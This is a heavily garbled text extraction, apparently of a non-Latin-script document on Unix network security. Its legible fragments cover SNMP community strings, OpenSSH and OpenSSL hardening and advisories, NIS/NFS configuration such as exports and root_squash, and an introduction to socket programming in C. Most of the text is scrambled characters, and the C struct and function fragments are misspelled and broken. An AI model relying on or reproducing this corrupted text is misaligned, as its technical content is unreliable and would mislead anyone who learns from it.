SNMP ? 5 TG' g•
P
T,
" - Y •
_? # 7
-, < K patch *
j*
?
$? ,
2 3@
$)
, 1 7 L*
6&
h,/ % H SNMP coomunity
R4 S @ : %
D Y/ 7 , H ?
4
*
"
6 @
] 6-
SNMP " - Y 7
S L $-,
•
,1 b
0 5 GF $ CERT Advisory CA-2002-03 5 5X
)TCP/UDP
,
^
w•w7
4], K5
SNMP agent
K6
9
),.
!89
SNMP
3
b
3
,
? &
w•p7
4
6N
"•
T
2#5 l ' J)0
("c T
$U#
B'T)
' " - Y 0
,
^
P
A R 4 W L3
? 5 V8
SNMP•
B
F) F 3 7 L
lYB
5! ?
y
6
6-
SNMP agentb
6
6
3
$
)
6
) TCP-Wrapper
P
(E
6
% !
agentb
) )
l '7 B
5!0_TCP/UDP
) X #
0
- Y
B' #P
<
?
6
1
)$,<
Q
0
(E
( E xined ,
& ?&
#4
agent
)
0 < +H ) [
h,/ % H
DY/
SNMP? 5 TG' g•
?@ " - Y 7 ) X (,! 7
I 5 $SNMPv3
N& ) 6( 4 , K
6 < %
P
" - Y •
T,
_? # 7
I5 W 3
"
$)
("c
2
0
- Y _
- ),.
)
) 7 L )-
)
( #.
6& ? G -, < - Y ] community
P!
h,/ % H g
& )
0
@ 3" ?
,
O*
u&
("c
:
2
0
(E
N
"W 3
6
F 7 # " - Y
•
P
!
6&
-, < '
- Y $http://www.sans.org/resources/idfaq/sanmp.phph @
) TCP/UDP
,
C
'
W L3
•
SNMP " - Y 7
*
0, < I
] 6-
^
w•w7
4], K5
B' ,
) )
6-
l '7 B
5!0_TCP/UDP
) X #
y
B' #P
<
# 40
(E
0, 6 ( E $-,< &5
$
,
-,< K
SNMP•
B
^
w•p7
F) F 3 7 L
6subnet 2 SNMP " E
'
4
6N
I5
SSH
(Secure shell)
% 'T
F$Login "
)7
l ' * ] OpenSSH
&'(
25
" U#
P
- Y $SSH Communication Security
R-
) telnet$ Ftp
6
,G
P
6=GX$ -,< - < *
&K/$ ? @ "
,
,G ) -
,, 2 5 0
b
_
U)
$l ' R 4 S @ :
_U
:
F
6=GX Q 0
F)
)-
56
?# $SSH
" - Y
N5
6=GX
,<
F
-,< K 7 !89 Q $"), )
] nix*) "), )
1
$U#
0, 5
Command
P B '8
i: ]
#P
<
SSH #
? `56 1
)$,<
K
&F 7c #< C
'
)? ,
(, !$
6
Q0
)_open-source 7 L
5
( ,H ? @ ? 5 M 9
R 4 S @ 2<
? ,6U)
)
6
E *
P
$SSH
5! U )
bP
0
?5F
SSH
6b.
SSH-, < "
- 4
6*
SSHS
%K ,
( N ) 6Patch
$("c "
# ) , #4
0,<
,
^P
< TP,
C L3
3 W 3 78#
)
SSH2
K 6% # ) 4
&
) HTTP$U )
$telnet
-, < -
-, 6 U )
…-,
^ P
C
$_ SSH2 SFTP
U)
L3
A"
R4S
4
Kc
F) ?@ ? #
2
#
"
@%
W
SSH2) SSH1
], < ? # -, 6 U )
) -,
4 (,!
3d *
6 *
R4 S @
, 5
6 &'(
F
" , G
$OpenSSHb
&
<
- <
# 2
6&
) clear text 7 L
-,
L3 2
U)
P
I
$ SSH1 % # ) 40
H
session
&
SSH2
#
)
0_
OpenSSH
"
2&N F , 5 ,H]POP3
? , % 1 2 , 0, <
],
N, #
@^
6A) a I ]rhost
6sessionS
% # ) 4 " - Y $ #P< )
:
R 4S
;! _rlogin) rcp rsh$, K
7 !89 T
)- P
d *
("c0_
SSH *
("c
F) & Z Q
OpenSSH ?
-,< E
6%
4%
CERT
2002-23h @ " ?
$ 9
l ' * ] OpenSSH " - 1
@ *
I 5 0,
7 K
&F "
6 @
pqqp T
0 5 - Y Advisory
) ' 6S @ ;! ) A
%
3
6
? "
R 4 S @ (, ! " ? 59 ) :
I 5 0, <
trojan-horse
_
2
7 !89 S
- Y http://www.openssh.org/txt/trojan.advh @ " ?
$l '- 1
@ *
0 5
,, e G
-,< K
* ]?@ " ,G OpenSSH 3.3 ?@ )
U
) SSH Communication Securitys SSH 3.0.0
% !
6
1 U#
*
6
)_version 3.6.1$pqqp T
Z F ) S L _version 3.5.2- 5 < pqqs T
-, < K
0 < ,6 3
* ] ?@ " , G
HS @2 e G
$
R4 S @ d *
*
R4 S @ W L3
-,< SL
U)
*
("c
- 5< " $“ ssh-v“
) - " d *
6*
$S
N 4
?
:
ScanSSH *
)
R4 S @SSH? , 6
#P
< 6h @
K
?@
http://www.monkey.org/~provos/scanssh/h @ " ?
'
a
4
6Z
0 5 SL
(E
- @
2 3@0, 5
&'( )$,%
Patch2 3@
" - Y
0
< &) j 4 ? , 6 U )
-, < K pqqw T
0,
2
& $ ScanSSH0,
Patching (,! % 1
,
0,<
- 5< ^ P
0 5
F
I5 , Y
1
$ ScanSSH :3
"
?
- .
F
"
*
$l ' R4 S @ : %
2
3@
?@ )
0, < 2t5: ?@ *
'
9:; 678
DY/ I 5
)SSH *
- 5 OpenSSH )SSH #
$,< -,< SL $% !
)
openSSH
%
% !
-, 6 K
"
9
2 3@ SL " $OpenSSH" - Y 7
•
SSH1 G
:
0,
0,<
? ,
-
*
P
,
TL ) I
-
*
6 & "
6
-, 6 U )
S!
5 $" E ?
!
j &'
0
6A) $?@
I5 ? @ " ?
, # 4•
U)
S
2
0, 5
U)
N 4
)•
W L*
,K
, #4
SSH? ,
2#5 -,
"
I 5 0,6 d *
,Y :
5
5/
rsh
2
NO , $SSH , # 4 % ' FallBackToRsh, B
P
-)8! S
,6 3
- 4 *
)? @" - Y
6 ) ?
- Y O B
:
2#5 $DES3A) ]
L
F
TL ? "
2`
7
3 5L -, @
), . ? # 0, 6 ( E
0
0
F)
$SSH-,< "
6
2<
" - Y )
) <,
! 5E
F
6 & "
SSH
SSH2 G
I
# 4,
G ), 51 /•
SSH2 SSH1 * $
Z
- Y DES3%
2, 0_,< -,< '
3
P
( #.
N& " •
blowfish
I
9
*
" & -,< ( E
e 'j 4
N& $ 7 B
5!
0 1M
(
0
@'U
NIS/NFS
) $(Nis)Network information Service)(nfs)Network File System
U)
Sun
) $ NFS0, <
<b
#P<
F
) V < ? # l 'U )
6 '• &
6
6
2
" - Y
7) Y
6
% ' I
,
6% ' Q
)
u T 5! ? # $NIS & 5
maps]
7
u T5! 7 ) X (,!]0, 5
?#
^
6% 'V
0
-,
) L*< 6
$ nis0
7
U#
6 #P
<
I 5 Microsystems
<
"
-
)
4 ) / 9$U#
F
2 % 'V <
,
6% '
A) $ NFS0
,
-,< +"
, 0, 5
-,< - Y
!89
U)
6 'hosts)passwd
6 '_ !89
] :
7 !89 K $NISM,62 5 0_ #P
<
"
F
6
I
6
5 group)passwd
?
,K
& 5
=GX C
8Q]
NFS I #P< 6U )
B'0
I5 ? @ "
,G
? @" ,
?5F
3 ?1
,, e G
6
"
H
NISb
I K6 &'(
" - Y
I 5 NIS
"
(& # 0
? 5F
,K
) 6, "
0,<
dos$buffer
S
', 6? G
F
6- Y/ " - Y Z
-, < - Y
- Y
patching)NIS)NFS 6U )
$S
F
6
0
_?
F
3 785/
, 63
) -
!89
)-
B
. 7
3W 3
F -
?5F
)
S
6=GX
?
H ypcat
j 5
P! &
+. /
- 5 U
0, <
1) U#
NFS )NIS
"
0 1 !"
6
5 CP
TG'e 'j 4 7 L $ l ' 6U )
!"
6U )
:
,F
) ) -
0, <
K NIS)NFS " *
-,
"2
(E
R4 S @
0, - 5 - Y
6U )
)-
\ " -, < ( E 785/ Q 0, -,
# 4 (, ! 7
% '
$NFS)NIC
56? 5F $ l ' 6U )
, K
6maps]
_ I
6=GX
, G 785/$ ? @ " - Y
overflows
-
_ <
0,
0 &'( )3 45 678
R4 S @ d *
I5
a
K6 *
5 0-,
), , e G
,1 b
,< -,
-,< K
SL ? @ )
F patch 2 3@
" - Y
NIS *
I 5 0 ' 6 @ -,< SL NFS *
j 5 &
NFS *
6@
- 5< l '
•
patch 2 3@ SL " ? 59 )
rpc.mountd-version
- 5 <"
4
6*
Q
) -,
(N
0 < ,6 3
HS @
- 5< " ?
] 5 - Y ypserv-version
" ?
0_
,6 3
(N
R4 S @ ^
0
R4 7
N
4
" ?
$ &'(
, ,F 6=GX W L3 , "c
a
4
NIS map
?
2
0 F
P!
a
4
NFS S
6" E ) netgroups$?
% '
& ?
7 L -,<
3
I5
, N (,! " ? 59 •
6&
" •
I 5 cracker
"
-,< = G
6& ( #.
"
5
, # 4 (,!
password root
6
0 5 - Y $-,< = G
- Y
NISS
"
I5 •
R4 S @ d *
P
!
, # 4 (,!
( N W
L3
3
I5
("c
•
etc\exports\.
) -, < export
"
! -,6
I 5 showmount e
F•
0
?@
6
R4 S @ : %
4$NIS , # 4
a
" ("c
N 4]? ,
U)
NIS? , 6 U )
)
0_NIS -, 6 U )
-, 6 U )
67
S
2, 0
4 n 9 " ) -,
- Y makedbm
^P
"
? 5 d* •
i
? G 6
TG'Yp-secure
U)
DY/ - .
6I W L3
J)$ DBM 6% ' E ? "
b
1
- 5 S ˆK " ?
6
:
2
3
0
•
C
'
,6 3 v 4$" E
0 5
-"
/var/yp/securenets
4b
6 #P< )
U)
a
%
)
?
+:*:0:0:::z •
password map
4 NFS , # 4
^P
-
-" F etc/exports % ' ? ,
U)
"
6h @ " - Y •
qualified domain names]fully_FQDN ) IP ,!
0_ <
& z •
- Y ypxfrd) ypserv 6
0
NFS ? ,
5!
#
"] G
- Y $ NFSBug (
0, 5
" ?
K
,
,
#4
I5
!
I5 •
#4
7 # l '
0 5
$NFSBug
" ?
'
0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @
% '
:
I 5 etc\exports % '" - Y •
),. T5!
a "
25
? )&' NFS % '
4
U)
mounting "
15G ?
domain (
^
4 ? )&' NFS
6
G5 …
) IP h @ " U
4
home10.20.1.25(secure)a8Q0NFS -,
? )&' ?
^
l '7 B
5!0 S
IP " U4_2< ) ?, 3
0
NFS % '
6" E
rw
)
? 5 export …
ro]("c
, 3 b'
( E etc\export % ' NFS -,
U)
6" E
domain (
./ro)10.20.1.25 homeC
8Q
^
Domain ( ) IPh @ " , G root_squash
superuser $, < -,< TG'l '
NFS -, 6 U )
)
4 #
H$ -,
U)
- Y NFS? ,
0
ID nobody
4 "$ ?# 7
NFS -,
U)
user root S
)
0
…
U)
ID root
)
2, 0
2&N F
, 6 * root )
6% ' u
root_squash/.)10.20.1.25 homeaC
8Q
?
l '7 B
5!0
0
TG'7 4 y
4
% !
4 NIS ) NFS
5 ?,< V8 " ? 59
^P
I 5 T) ' 6
•
n 9" C
”
'
"
)
(_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C
8Q]
U)
)
( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&'
a
67
$U c
$ NIS)NFS ? , 6 U )
N" •
) X
?#
0 <( E " E ? ,
g
0SSH• I 25 % # ) 4
2
NFS" - Y W L3
)
•
("c
0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ?
NIS ? , 6 U )
,
# 4 ) SL
Z
)? ,
^
,1 b
-,< K
6 @
0 F
7 !89 "
checklist UNIX h @ " ?
$=! >
5 SL •
6patch
*
%K
:
$ NIS)
2 3@
? 5 m .1 U#
0 5 - Y security
d *
K6
W L*
deamons
)
("c
N 4
0 5 MR/
, K ) / 9 NIS )NFS -, 6 U )
I 5 0, -,
) "
NIS ) NFS? 5 TG' g•
^
6 )]NFS ) NIS
_?@ )
6U )
?
Layer open secure sockets
(SSl)
? )&'
H
I5 f
^ P
N, #
l 'f #4 " -,
(E
N ,G
#P< n 9 "
- Y
6
open source 7 L ]openSSl
&'( $_
2
K6
-, < 1P 7 !89
j &'
?
^P
, 5
4@ -, 6 U )
SB
g
? 5F 0, 5
"
openldap,cups,maila
I
OpenSSl0 < , 6 3
a 5 - <? @
H$ l ' R 4 S @ ^
N
H F
5
" - Y
0, <
2
,G
e G
5
openSSl
- Y openSSL
,G
$(
*
# 0,
- Y
-
?5F 0(
openSSL
5
& , 5
?
$ openSSL
M, 6"
0,
6
- Y openSSL
6
25F
6
#P
<
I
3 785/
$ :
u 3
3
K
O*
"
H
a, 5
5/ I 5 ],<
openssl " - Y $ 7
I
N&
H M, 6%
- Y openSSl "
4@ -, 6 U )
^ P $hhtps "
0, -
" connectionn
N&
3 <) 2 5 $
0_‹‹s 7 4 )
*
R4 S @ ^
$()
$T)
? G - *1 ,
,, e G
% !
6
F
) openSSL 0.9.7 *
?@ )
U
0 < ,6 3
1 ) U#
HS @2 e G
6
"
$
6
F ?@ " %P
H
R4 S @ d *
,, e G
$,< -,< SL ?@ " % H
I 5 $ openSSl version
" ?
) versipon 0.9.7a *
:
2
0 5 - Y $-,< SL
#
0 < ,6 3
&'(
*
H S @)
- 5< "
R4 SP @ : %
a
4
"
- 5 OpenSSL #
9
*
2 3@
9
% !
%L
0
I5
"2
F
6 &
openSSl -, 6 U )
)
•
?@ ) '
•
) ipfilter" $? # 7
K6
<- Y
Z
, 1 " $,< -,< SL % !
0 5 SL
T 5!
DY/ I 5
2 , ,F ) 2 3@
-,
6@
DY/ - .
$l ' R4 S @ : %
$ openSSL *
- .
:
), .
$,
U7
$iR= 8 " 7 $
Socket Programming
K
&F ? G ) ( E % !
Unix % Q
6% !
?
,
u
0 <
F) M :G 2
@
TCP/IP – B
#) 4 "
6‰ 9 b
bP
S L ) K ?@ - 56% !
h
?@
IP)TCP
B
#) 4
SB
F Linux % !
- 4C
c 5G
2
?,
Windows
%
6
"
6N
"@
H8! I R1
6b .
%B
.)
0
N C %Q
@
, 6,
b.
u
,6 * U
) -
?)
-, < = D U
/ 9
<
b.
#
= G
c
•
A 3
)
) W 3 # ) #1
C5
6
2
‰9
6Y
.
, U
BT
6
K6, $n5! ,
GCC F
2< ? "
c
.
K %L'2
,
• ( Y ) #P<
TCP/IP% # ) 4
i
.
e ' , 5 %
<@ #P
< .
H
7
-J) 7 #
G(
0,<
e 'T/
% '
,
2< A) -
0, 5
%L'2
0
b.
4 b.
1Q ) 6
K 2 `56)
) Linux % !
5
63
6C? "
,
, <
0, -,< 5F
,63
PE
.
( Y2
.
(
6
^P
'#< ,P
1
" g@ : %L'2
0,
#P
< .
Y(
H
?@ ( Y ,
(5
I
%L'2
c
,<
6
P"
U#
(5
% !
) ,< \, 6 ) 4 2 -
/
y
?/ 9 b
? F T P) #P
<
0
% '
7
b
B'"
) N4
,
&
(I/O)
6 F) 3 )
,
5 6Y
", -
6U#
5 <, < $,
3 @
T,
• , < -, <
) )\
,
)%
% '
b.
B
5F 2 5< , <
! ( 5 •0 < T, )
7
@
L
N4
#
B
% !
N N)
(E
"
,
T /2 !
)-
7 B
5!
3
,
$2
k
a, 6,
(Read Only)
< b' B'7 L ?@
,
(
_ fopen()
- <? !
% ' L*
% ' , 56
N4
open() 7
% !
&@
_=1
] 0,
' %P
H B
/
"
E
_O
0,
2<
15G 7
0,
?56
, <T
N4
$_ fwrite
%PH B
/ " -,< " % '?)
_ fclose()
? ! ˆ6
0
)
)
("c 2
-, !
2<
close() 7
U
0 ,< ,6 *
B
/ ,
j 5 .Y % '( ,
H
4"
] 0, , P % '
( 5 " U4_
256 < ( E ,
B
15! ) N4
* ? G N4
", -
#
H- Y
0 , 5 T, % '? !
# ), ,
F) 3 )
=B*
a, R
"
6N
B
/
?@ " ?,
3
j 5 .Y
6N
#
U
B
5! ( 5
,6 3 M Y< ) -
)? #
@0
(5
H U#
< b'
B' N4
, 3 b'
, 3
B'T
< )
< )
, 3
< )
7
, 3,
F
,B
B'-
B'U#
I/O \
L % !
a
6
5< $
, 3
B' *
, 3 b'
(con)
I
) )
6- & ,
< )
3
= D) 2
0 < '
2
_z
]% '
C H ,< 'G N4
b '$
6-
write() 15G
k ) ", -
% !
,
)
% '
'
b.
6
' R4
?
…
B' N 4 …
? G j 5 .Y …
B'T
7 4…
)
GH ) % ' …
)
GH ) % ' …
11b3
FIFO =
…
# 2 5< 26• T/
T, ) X ! % H
,
% '
F) 3 |
) )
6 ) ?@ 2 7 !89 1P ) #P< )
) ^P
@
€ , (I/O)
)
) 2 ^P
- N@ 6,
5G
#P< ^ P
a
•^ P •
]
H
'
2
T 5G nP9 7
) -
0,
2
N
g
‰8:
),
?)
"
IP h @
) _d *
,
,
•^ P
socket() 5
˜4
g
- <
- <•
&@
$,
,
$
&@
0,< ,6 3 - Y
- <?
6 ' ^P
' 7
3
,G
I
)
#P
<
6-
,
6-
1P 7 B
5!_z
,
SB
9% !
0, & ,
3 '
1P
( ,H [
1P
7 , ?
1) ) +
_O
?@ "
6-
' %5!
P
(Null) —14
5<
% ', 56 ^ P ,< ( 5
+
7 4h @
5< % !
0, 5
"
6
6 '_d *
%5! ?
read() ] rece()) [ write() ] send() +
_=1
]W 3
,6 3
?56 $%P
H B
/
6
3
% ' - <
0,
% '
" T)
b < ,6* % !
?@ ) W 3
& @
' R4
% ' 3
3
?@ "
•"
N
•" -
62 " U4
) TSAP : ) 2 7 !89 1P " ^ P
)
0 ,<
) )
?
" , /)
% '2,
#P
< .
6 )
$, 3
6^ P 2 "
6 L*
@"
? &56?
B', 56CH
< _% ' - <
]
) < " ) TG'^ P 2 ,
0
(E -
@"
? &56 :
1P
@ " (,
@ 6Y )
0
,
F)
\ )
a ",
P
!
'G
\ ) 2 _0 ,
0 <
-,
N1L
\
6
56 I "
56
1
),
66
6
#5
\
\
6*
N \
]
6
…
0 <
6 Y 2 7) Y $
\
-,
TL ?),
\ ) 2 ( Y2 &5
6
T
A) 0, 6,
' 7 I
2t
5: ) S
N` 6)
2t5:
!
(
6-
2
\
. )
P! ™Y/ , "
$ (FTP) % 'T
%# ) 4 TQ ? G 0,
TCP A) ?56
(SMTP)
# ) #1 6
T
-
\
" C
GP
9) ,
1P 15 /
F) 6-
5>
K6%# ) 4 ) 7 ,3 Q
? FS
! 2 `56) 6
(HTTP) 2
%# ) 4
6:3
? FS
c
6 6-
7 !
UDP ) TCP \ ^ P
0, <
, -,< = G (
…
) j4
)
,
\
,
H I,
0
-
(
7 .Y T
62t
5: ^ P
H
%# ) 4
, "
N56
0,
"
13 ) S
!
) 6
TCP % # ) 4
0
H
) ^ P ˆ6
.
%Q 6
H
"
$ 6-
?,
"
3
A) 2 2 /
0
P CH
B
/
\
#
A)
5> 2
6" 78#
(5
TL
F) 6-
)-
,6 3
,6 3
(8! % !
+ ) >' ,6 3
i:
6-
" - Y
% !
^ P = G"
1P
" UDP
0,
S
6-
0, <
)
$TL
2 5>
L ) ,
0 ,<
&
1P "
\
1P 6-
,
#P
<
6-
P(
DNS
H- Y
TCP 6% # ) 4 " - Y
)
,
), <
1
)
1P :3
0
UDP %# ) 4
?), )
N 56
IP %# ) 4 ) , 5
+H ) ?@ 2 " c
%P
H CGP9 ) -
) 6-
B
# ) 4 TCP ,< - < C
8P
H
6-
<
T
T
!
5<
/
UDP
3
!& ( Y
3% 5 C
85!
= G U
TCP %# ) 4 7 K
&F ?,<
E $^ P
H
F
?),
"
| -, 6 U )
( Y
G ,<
'9 )
9P
\) < I.1
"
6
F % H
^ P 2 ' 9 R 1$ <
# ^P
6
^P 2
0, < -
0
%
,6 3
= G
(8! % !
š7
^P 2
6-
<
#P
<
) 4) 2
6-
M 9)
R4 ?#
# 2
^P C
85!
1P
3% 5
YB^ P -,
\) < $2 '9
1P $^ P A R4 7
C, ! H
•
•
0 ' ,6 3 (
•-, 6 U )
0
^ P -,
•_-
\) <
?@ I ) ]
a
0
2
7 !89
% 5 )
@) ),
SB
9
, , "
R4
R4
5! = G
) 4 Client
c
C
) 4 Server -, 6 U )
3
!89
, /) $ X
task , 5
I
)
RN V <
7 !89
0,6, % .
I $-
7 P!
I T /2 !
-
)-
?
)
3
F
3
O) -, 6 U )
O) 7 .Y S1H
) )- 5
<
SL -, 6 U )
?@ A"
-,
4 " U4 )-
2<
'
\) < -, 6 U )
H) TQ ? G
!89
7 .Y 2 "
0, 5 T
)
" 2*
X
X
2
)
5
v 4
("c
-, 6 U )
^P
H
B 1/
2
P
5
X
, 5 T
I
S
v 4$X
0
7 !89
3
$"
) ,< ,G ,
2<
;.
,
)
-,< +"
6
5
6
/ 7) Y
<
)
N] 0
6
^P
%
M 9
,G 0,
6-, 6 U )
,G C
c 5G 2# 1
_0,
) N* 4 $7 !89 S/
,
*
H
-,
,
T
I
Y
, N I
N M 9
–
…-, 6 U )
5 –, 5 T
* 4)j
N
;.
5 …
4
B
F TQ
T
\X
I
:
-, 6 U )
0
5
3
,6 3 7) Y $ <
%
$
a
% !
b'
\ % !
% !
,
b.
F $
0,
+ b
(5
2 0, 6,
,
-,
6^ P
?
6X
A R4
I
' % <+
6-
) >' ,
TCP ^ P
Q ,/ ,
6X
4
E
"
< A)
2 G Q ,/ ? G % !
,<
( E bind()
) TCP
TCP
5
6
6
$
"
5
,<
,G B
/
_z
2 0, 5 \) < TCP
,< ,G ^ P
A R 4 (8!
,
'
F
)T
) -, < ' R4 ? &56
, "
U#
_O
<
(8! % !
b
^P
^P
,6 5<
( E listen()
G
)
" - Y -, 6 U )
,
3
+ b
( UDP
4 - 5< UDP
A
(8!
"
/
4h @
, 3
, -
0,
,G 2 G C
c 5G 0,
< A"
TCP )
<
)
A R4
TCP 7 9P
-
/
&1bind()
2#5 ?
3
2
_=1
= G, "
4h @
7
5<
L*
2
'G W 3 7
,G
#B
3
H ] 0, _0
^P
P 7
5
5
( E Socket() 5
- 5 < ? <,L
R4 ? G
<
^P
(8! % !
: 5< I
-, 6 U )
'G ( UDP
2 0, K5
) # @ " %P
H
2 `56) -, 6 U )
"7 B
5!
0 <
5
1
5
0, )
( Y
F T/
›
(E
B
/ 2 56
|-, 6 U )
5
,6 3 , "
E
,!
F
N1
a K5
,
5
6X
H 0, N
("c
>'
:,
,G 2 ,
1
)$
5<
0
7) Y ^ P 2 ,
T G') " 7
,
L
L
$? &567 L ,
7) Y
B' , G
"
<
-, 6 U )
)
2,
)@
6"
7) Y ^ P 2,
Q ,/ ,G % '
0 < " ? &56 : 5<
? G 0,<
b
,
<
]
nB
G 7 9P "
,
X
" accept() + - Y
% !
Y D 7 # accept() + 0,
% >Y
'G 5<
C
_
_ F) 7
0,< ,6 3
0, K5 - Y
0
,6 3
5
recv ) send 7
1P
R4 ?# A) )
2 0, 6, 5 3
_ close() + b
] '
_ shutdown() + b
] '
)T
_-
^P C
_)
'9 ) ^ P +:H …
7 B
5! "
# ':# +:H …
a < T5!
% !
b' E
0, )
F $
^P
0,
P 7 4h @
3
U)
^P
-, 6 U )
H
, 56
-,< (8!
("c ,G B
/
,
F) bind()
" - Y
X
A 3 #B$
? N " ^P
connect() 5
?@ 5
_=1
6^ P = G , "
-, 6 U )
5
L*
_O
)&1 G , 6,
+ " - Y
X
X
I
?@ , ,< -, 6
0,
TCP ^ P
0
H
9P 2
TCP 7 9P
5
_ Hand Shaking]
B
/
( E ) \) < 1 C
85! connect()
R4
<
2
M 9
1
),<
0
( , H 6-
H
'
)T
'
G
'X
$
&@
ˆ 6?), ,
%/
$, <
" bind() + "
- Y
,6 * ("c
TCP ^ P
#
^ P -,
Y
<
,
93
C,E
3 7 4 - 5<
\) <
' connect() %5!
)
-, 6 U )
0, 5
0, 5 ( ,H 60, 5 +:H '9
'9 ) 7
'
T
shutdown()
send() ) recv() +
close() +
" _z
^P _
?@
H)
5
-, 6 U )
"
5
6
1) ) +
B
2 `56) 60 6,
("c ?5 3
6C
_0 ,
^P
\
6,
\F
u $ "= G
`56)
?@
-
N
G
H
) i.
H
6-
" g@
•
L* •$-
N
\ 21
)
)
H- Y
a,<
L*
$^ P
= G C
8G'0
?5 3
.$
,!
`
-,
2
$% ' - < , 56
) 47 4h @
3
?@
G:H ( 5 ] 0
?5 3
"
6 u
" U4
H
P
"
N1
H
-
"
,
A
Int
A;
\ 2 )
^ P M 9 2 < IPh @
3
a "7
Struct Sokaddr {
Unigned Shortsa_family ; /*address family AF_xxxx*/
Char sa_data[14] ;
/*14 bytes of protocol address*/
};
2 G
& 2
/
R 1œ ' , 6 3
\ ,
6 #P<
d*
B
#) 4
)
TCP/IP % # ) 4
N
0,
#P< ;.
6
$
IP h @ $7
) 7) Y
0
< 5 -,6
! 5E
5
2G
[
3
-
3
& 2 Appletalk %Q
,6 3 7) Y
4h @"
,
B
#) 4
8G'0,
C
AF_INET
0
N
I
%L'2 %
d*
3 a sa-family …
-
) ) ) #P<
7) Y
0
\
2 a sa-data …
-
6, B'2
c
=
G
1
)
)
)Y = G 1
)
B
PH #
T G CH
a, N -
<
- *1 ( ,
Struct sockaddr_in {
'G `
6" ,
5<
/*address family*/
Shortint_family ;
Unsigned shortintsin_port ; /*port number*/
Structin addrsin_addr;
/*internet address*/
Unsigned charsin_zero[8];
/*same size as struct
Sockadda*/
#P<
),
2 G
-
3
d*
#
I
)
8! ?), $i.
d*
,! C
8
, 56a Sin_port …
[ ,
) ,B'2 a Sin_port …
) 47 4h @$
A 3 ,B'2 0,
%
3
< AF_INET
0,<
0, 5
B
P
H
2 < IP h @ a In_addr …
I
, , b '$, < , 6 3 = G
0
Y
,
,
B
#) 4
8
C
,
6 #P< ( 5
<= G
,
( Y
l'#
IP h @ C
8G'
h @ T 9 6 #P< "
-
62 a Sin_zero [†] …
6
?@ $,B'2
2
#P
<
N
#P
<
Y C 5 memset() % Q G 9
F) % 1 0, <
) -,< - Y T G 7
0,< - Y % H #P
<
3
1/
6
`
,
C5 / 1
)
0
<
$7) Y
B
#) 4(5
) 7 4h @
"
N62
'X
0
62 ,
0 <
" (,
6$+
3 ' ?
= G " - Y \ 5E
) , T G CH
1
)
N
B
P
H `
F •\ n : •
0
?@
3
-,< = G in_addr (
N
)
#
()
,6 3
, 5
H
#
@
/ ()
#
= G
0
"7
/*Internet IP address (a strcture for historical reason)*/
Struction_addr {
Usigned longs_addr ;
l '7
IP h @
?@ = G )
?@
9
0
2# 1) ,
B
P
H #
T/ 6
- Y
<)
5< - *1
I'/
5<
,6 3 6
a <
F
- 3• 3
2
1
6,/) S
< SL
"
LE \ "
<
6 ,
-
m.1"
G
< 78#
_-
< 7) Y <R
-,< n' DE 7
H) R1
S E! 5
6, B'
F)
LE \ ) BE \
H
#P
< )
c
,
,< - < )
, B'2
'G unsigned long
6" ,
7 5B "
I
1
)
0,< , 6 3 'G
)
%
$,
-, < = G c 7
%# ) 4
N
TCP/IP
S
LE
)
3
<
H) TQ ? !
0
3
Struct sockaddr_inas ;
As.sine_port=0 xb459 ;
" U4 R1
H A"
I _- P< CG:H )]
4
?@ " ,G )
<
- 3•T) A"
7 4 h @ TCP
"7
?
) 2 2'
H
a,< ,6 3
B4
59
)
+
, 6,
H
6, B'?)
,
'G % 1 2 56 0,<
a
S
) X
U
htons() a BE 1/
htonl() a BE 1/
ntohl() a 2 <
H) 2
) 2< \ ? N
#P
<U
ntohs() a 2 <
H
B
G' 1/ BE "
B
G' 1/ BE "
& ? !
"
) 7 5B % ,P +
7 5B % ,P +
) 7 5B % ,P +
7 5B % ,P +
, ,
A
SL
"
)
F- Y
6, B'
2<
?
3
("c U
LE 7
H " %PH C
5 /?
0, - Y l '+
IP
TCP
,
I
,B'C
<
- Y l '+
sin_family , B' sock_addr_in `
-, < = G % !
l '+
"
<@ l '+
,B'2 )
"
H) b'a R
T Q? !
< I
H
("c , B'2
6
,
- Y
<
6 3
[
AF_INET
,
R 1$, < ,6 * %
1Q
#P
< ) )
0
5 - Y
a
6, B'
IP
S1H
@
<
h @ ,B'?)
IP h @ I 78#
,
IP
•2
6h @ ;.P
a, <
<
6-
pwwžwwžw‹qžw{p
,! IP h @ ,B' sock_addr_in `
IP
3
@O L
F "+ ) 2
1/
4 long \ " ,!
<
a
‹‹žwwžwpwžw†} ( '
, B' BE S1H
<
,!
% ,P
R1l '
+ 2 a inet_addro() + …
U4 )
< h @ c TQ
0
h @
7
L
G ,6
B
P
H + % 5! U#! + 2 ainet_ntoa() + …
(E
IP h @
<
) struct in_addr \ " l '+
H 9
7 L
) )
4 0, 5
a " TQ
BE S1H
@) '
% ,P $0
= G
:
< \ ?@ F) 3
printf (%s , inet_noet_ntoa (ina.sin_addr) ) ;
k
F) 3 ) -
G
)
:
< 7 L h @
a
"( '
. l 'TQ
F) 3 C
8Q 0,< ,6 3
wqžŠžw‹wžwsq
IP h @
www.ibm.com ( ' -" /
)=
("c +
G
,
?@ " % P
H0
@ % ,P N N
@
*
6 3iX
b.
0, < = G ^ P
_ TCP
P] -, 6 U )
H
- Y
+
Socket() +
a
"7
+
B( '
#include <sys/type.h>
#include <sys/socket.h>
intsocket ( intdomain,int type,int protocol ) ;
- <C
8PH
.
I AF_inet
0 <
\ ,
,
,
,
(8!
Type , B'
?@
,
3 -, 6 ?
[ ,
$
? 6 *1
#P
<U
\
\
0,< (
\ "
H sock_stream
) 6,
I
? I
%# ) 4
0
#P< .
,6
56
H(
#P< 6
) T)
6, B'
0
–, G +
?@ "
"
R 1_% '
,
0
Ÿ
+ 2
N
<- Y ,
,N
H
,
F) 3 C5 / , YD U
+ 256 F) 3
:3 - 5 < error
"
? G 5 <)
,< , 6 3 'G
+
,
,
+
:3 - 5< A"
<
7 B
5!
u ,< …w , socket() +
Perror() 5
56
5 3^P
' %5! ,< …w socket() +
, ) ) - P& @
,
[
- < % Q C H ] ,< ,6 3 - Y
0 <
=H
,6 3
?56socket() + b
L*
L*
a Protocol …
< - 5< ,B'2
Y ?@ ,
[
I Sock_DGRAM
0,
,
,<
a type …
42
\ ? 6 *1
3(
4 2 a domain …
6
,
4
0,<
H)
-
5
)
, = G
"
+ )
u ) 2 0
-, @ 1Q
?@
# A)
0,
6
a Bind() +
^P
y
b'5<
bind() + 0
h @?
-,
P
0, 5
6
a,
H
(5
,
,6
- 5< , <
"-
0, 5
= G
5
c 5G
C
•-,< "
7 4
(
